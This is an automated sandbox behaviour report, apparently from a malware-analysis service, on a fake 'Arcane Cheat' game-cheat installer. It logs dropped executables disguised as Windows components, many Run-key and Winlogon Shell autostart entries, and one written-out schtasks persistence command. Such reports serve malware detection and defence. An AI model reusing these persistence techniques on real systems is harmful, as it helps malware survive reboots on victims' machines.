            Source: C:\Users\user\Desktop\uChcvn3L6R.exeFile created: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jdwp.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-LS3UA.tmpJump to dropped file
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeFile created: C:\Recovery\RuntimeBroker.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\java.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jsoundds.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\javaw.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jfxwebkit.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-OMDGH.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\javaws.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\msvcr120.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-M8DR9.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\msvcr100.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jfxmedia.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\resource.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\kcms.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-1D9V4.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-TJN2U.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-RKJ6P.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\ssv.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\plugin2\is-OVE01.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-6EJKR.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-H7O6N.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\prism_d3d.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\rmid.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\dtplugin\is-7TEQQ.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-8GHN8.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-GFQTQ.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jp2launcher.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-FDP9A.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exeFile created: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\t2k.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-RPV0O.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\plugin2\msvcr100.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\npt.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\plugin2\is-1RSEV.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\dtplugin\npdeployJava1.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-069DQ.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-KFFNG.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\javafx_font_t2k.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\unins000.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-3TU72.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-NE044.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-FA3UT.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-7LLC2.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jp2iexp.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\ssvagent.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-90393.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-O1CKK.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\deploy.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jp2ssv.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\dtplugin\deployJava1.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\servertool.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-2KSRS.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\java_crw_demo.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jsound.dll (copy)Jump to dropped file
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeFile created: C:\Windows\addins\audiodg.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-MV7G1.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\dt_shmem.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\unpack200.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-F27BH.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\rmiregistry.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-11A56.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\JavaAccessBridge-32.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\fxplugins.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-RMB9M.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-RBKCS.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jjs.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\Arcane Cheat.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\JavaAccessBridge.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-4UUQJ.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-T1J1I.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jli.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-162RA.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-CSEKM.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-FF2ON.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-PFI2B.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Users\user\AppData\Local\Temp\is-N4812.tmp\_isetup\_shfoldr.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\is-5H46A.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\is-8NKS2.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\javafx_iio.dll (copy)Jump to dropped file
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeFile created: C:\Windows\en-US\qiOZcVoixJLcuAFKAnRd.exeJump to dropped file
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeFile created: C:\Windows\addins\audiodg.exeJump to dropped file
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeFile created: C:\Windows\Fonts\qiOZcVoixJLcuAFKAnRd.exeJump to dropped file

            Boot Survival

            barindex
            Creates an autostart registry key pointing to binary in C:\Windows
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodgJump to behavior
            Creates an undocumented autostart registry key
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Creates autostart registry keys to launch java
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000 RegFiles0000 C:\Program Files (x86)\Arcane Cheat\Arcane Cheat.exeC:\Program Files (x86)\Arcane Cheat\jre\bin\awt.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\bci.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\dcpr.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\decora_sse.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\deploy.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\dt_shmem.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\dt_socket.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\eula.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\fontmanager.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\fxplugins.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\glass.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\glib-lite.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\gstreamer-lite.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\hprof.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\instrument.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\j2pcsc.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\j2pkcs11.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\jaas_nt.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\jabswitch.exeC:\Program Files (x86)\Arcane Cheat\jre\bin\java-rmi.exeC:\Program Files (x86)\Arcane Cheat\jre\bin\java.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\java.exeC:\Program Files (x86)\Arcane Cheat\jre\bin\JavaAccessBridge-32.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\JavaAccessBridge.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\javacpl.exeC:\Program Files (x86)\Arcane Cheat\jre\bin\javafx_font.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\javafx_font_t2k.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\javafx_iio.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\javaw.exeC:\Program Files (x86)\Arcane Cheat\jre\bin\javaws.exeC:\Program Files (x86)\Arcane Cheat\jre\bin\java_crw_demo.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\jawt.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge-32.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge.dllC:\Program Files (x86)\Arcane ChJump to behavior
            Creates multiple autostart registry keys
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qiOZcVoixJLcuAFKAnRdJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinStore.AppJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodgJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorerJump to behavior
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qiOZcVoixJLcuAFKAnRdq" /sc MINUTE /mo 12 /tr "'C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exe'" /f
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Arcane CheatJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Arcane Cheat\Arcane Cheat.lnkJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodgJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodgJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodgJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodgJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qiOZcVoixJLcuAFKAnRdJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qiOZcVoixJLcuAFKAnRdJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qiOZcVoixJLcuAFKAnRdJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qiOZcVoixJLcuAFKAnRdJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorerJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorerJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorerJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorerJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinStore.AppJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinStore.AppJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qiOZcVoixJLcuAFKAnRdJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qiOZcVoixJLcuAFKAnRdJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qiOZcVoixJLcuAFKAnRdJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qiOZcVoixJLcuAFKAnRdJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qiOZcVoixJLcuAFKAnRdJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qiOZcVoixJLcuAFKAnRdJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qiOZcVoixJLcuAFKAnRdJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qiOZcVoixJLcuAFKAnRdJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qiOZcVoixJLcuAFKAnRdJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qiOZcVoixJLcuAFKAnRdJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qiOZcVoixJLcuAFKAnRdJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qiOZcVoixJLcuAFKAnRdJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
